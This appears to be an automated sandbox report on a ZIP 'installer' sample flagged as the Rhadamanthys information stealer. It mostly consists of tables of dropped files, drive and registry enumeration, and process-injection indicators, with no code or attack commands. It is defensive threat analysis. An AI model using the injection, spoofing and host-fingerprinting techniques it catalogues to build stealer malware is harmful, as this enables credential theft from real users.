Malware Analysis Report

2024-11-30 02:15

Sample ID: 240326-pdgk4acg7y
Target: x32_x64_installer.zip
SHA256: 718dc58c02f2c98eda1eae96c5bde5e0d71bf418c483fea0eea84645b4cafae6
Tags: rhadamanthys stealer
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V15
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score: 10/10
SHA256: 718dc58c02f2c98eda1eae96c5bde5e0d71bf418c483fea0eea84645b4cafae6
Threat Level: Known bad

The file x32_x64_installer.zip was found to be: Known bad.

Malicious Activity Summary

rhadamanthys stealer
Suspicious use of NtCreateUserProcessOtherParentProcess
Rhadamanthys
Blocklisted process makes network request
Executes dropped EXE
Loads dropped DLL
Enumerates connected drives
Suspicious use of SetThreadContext
Drops file in Windows directory
Drops file in Program Files directory
Program crash
Suspicious use of FindShellTrayWindow
Suspicious behavior: AddClipboardFormatListener
Enumerates system info in registry
Suspicious use of UnmapMainImage
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: EnumeratesProcesses
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Modifies registry class
Checks processor information in registry
Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-03-26 12:12

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-03-26 12:12
Reported: 2024-03-26 12:22
Platform: win10v2004-20240226-en
Max time kernel: 570s
Max time network: 566s

Command Line

sihost.exe

Signatures

Rhadamanthys

stealer rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

Description | Indicator | Process | Target
PID 3400 created 2416 | N/A | C:\Windows\SysWOW64\explorer.exe | C:\Windows\system32\sihost.exe
PID 4912 created 2416 | N/A | C:\Windows\SysWOW64\explorer.exe | C:\Windows\system32\sihost.exe
PID 3456 created 2416 | N/A | C:\Windows\SysWOW64\explorer.exe | C:\Windows\system32\sihost.exe
PID 2496 created 2416 | N/A | C:\Windows\SysWOW64\explorer.exe | C:\Windows\system32\sihost.exe

Loads dropped DLL

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A
N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A
N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A
N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A
N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A
N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\dirmngr.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\dirmngr.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\dirmngr.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\dirmngr.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpgconf.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpgconf.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\scdaemon.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\scdaemon.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\scdaemon.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\scdaemon.exe | N/A

Enumerates connected drives

Description | Indicator | Process | Target
File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\F: | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File opened (read-only) | \??\P: | C:\Windows\System32\msiexec.exe | N/A
File opened (read-only) | \??\V: | C:\Windows\System32\msiexec.exe | N/A
File opened (read-only) | \??\Y: | C:\Windows\System32\msiexec.exe | N/A
File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\B: | C:\Windows\System32\msiexec.exe | N/A
File opened (read-only) | \??\E: | C:\Windows\System32\msiexec.exe | N/A
File opened (read-only) | \??\I: | C:\Windows\System32\msiexec.exe | N/A
File opened (read-only) | \??\J: | C:\Windows\System32\msiexec.exe | N/A
File opened (read-only) | \??\D: | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File opened (read-only) | \??\A: | C:\Windows\System32\msiexec.exe | N/A
File opened (read-only) | \??\T: | C:\Windows\System32\msiexec.exe | N/A
File opened (read-only) | \??\X: | C:\Windows\System32\msiexec.exe | N/A
File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\G: | C:\Windows\System32\msiexec.exe | N/A
File opened (read-only) | \??\M: | C:\Windows\System32\msiexec.exe | N/A
File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\H: | C:\Windows\System32\msiexec.exe | N/A
File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\F: | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File opened (read-only) | \??\K: | C:\Windows\System32\msiexec.exe | N/A
File opened (read-only) | \??\R: | C:\Windows\System32\msiexec.exe | N/A
File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\D: | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File opened (read-only) | \??\U: | C:\Windows\System32\msiexec.exe | N/A
File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\F: | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File opened (read-only) | \??\L: | C:\Windows\System32\msiexec.exe | N/A
File opened (read-only) | \??\S: | C:\Windows\System32\msiexec.exe | N/A
File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\N: | C:\Windows\System32\msiexec.exe | N/A
File opened (read-only) | \??\O: | C:\Windows\System32\msiexec.exe | N/A
File opened (read-only) | \??\W: | C:\Windows\System32\msiexec.exe | N/A
File opened (read-only) | \??\Q: | C:\Windows\System32\msiexec.exe | N/A
File opened (read-only) | \??\Z: | C:\Windows\System32\msiexec.exe | N/A
File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\D: | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A
File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A

Drops file in Program Files directory

Description | Indicator | Process | Target
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\page_embed_script.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\gl\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\kk\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\lt\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\128.png | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\ta\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\bg\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\eventpage_bin_prod.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\de\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\nl\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\hi\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\el\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\sv\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_metadata\verified_contents.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\msedge_url_fetcher_1472_264658919\GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_75_4_0.crx | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\am\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\bn\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\no\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\es_419\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\id\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\uk\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\ro\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\fa\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\mr\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\ur\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\dasherSettingSchema.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\et\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\th\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\fr_CA\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\ja\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\lo\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\zu\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\ko\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\en_CA\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\pa\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\pt_BR\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\en_US\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\sw\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\ms\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\hy\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\hu\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\zh_TW\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\ka\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\pl\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\zh_HK\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\cs\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\cy\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\eu\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\is\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\ca\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\sl\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\pt_PT\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\af\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\en\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\en_GB\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\ml\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\ar\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\ne\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\tr\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\km\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\fil\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
File created | C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\zh_CN\messages.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A

Drops file in Windows directory

Description | Indicator | Process | Target
File created | C:\Windows\Installer\e59d319.msi | C:\Windows\system32\msiexec.exe | N/A
File created | C:\Windows\Installer\e59d315.msi | C:\Windows\system32\msiexec.exe | N/A
File opened for modification | C:\Windows\Installer\MSIE883.tmp | C:\Windows\system32\msiexec.exe | N/A
File opened for modification | C:\Windows\Installer\MSIE99D.tmp | C:\Windows\system32\msiexec.exe | N/A
File opened for modification | C:\Windows\Installer\MSI2E4B.tmp | C:\Windows\system32\msiexec.exe | N/A
File opened for modification | C:\Windows\Installer\e59d315.msi | C:\Windows\system32\msiexec.exe | N/A
File opened for modification | C:\Windows\Installer\MSIEA59.tmp | C:\Windows\system32\msiexec.exe | N/A
File opened for modification | C:\Windows\Installer\MSIEDF5.tmp | C:\Windows\system32\msiexec.exe | N/A
File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A
File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A
File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A
File opened for modification | C:\Windows\Installer\MSID622.tmp | C:\Windows\system32\msiexec.exe | N/A
File opened for modification | C:\Windows\Installer\MSIECDB.tmp | C:\Windows\system32\msiexec.exe | N/A
File created | C:\Windows\Installer\SourceHash{654024B2-0767-4BCD-BC79-7CF46AF9D5A1} | C:\Windows\system32\msiexec.exe | N/A

Checks processor information in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3808065738-1666277613-1125846146-1000\{6E140374-1889-48B5-BB86-B4871CA0CE5E} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3808065738-1666277613-1125846146-1000\{756DD9AC-0A57-4FD0-9B91-097FCFC96327} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3808065738-1666277613-1125846146-1000\{38A4DE08-9A7B-4EFD-8A8C-0382089BF6F6} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\system32\msiexec.exe | N/A
N/A | N/A | C:\Windows\system32\msiexec.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\dialer.exe | N/A
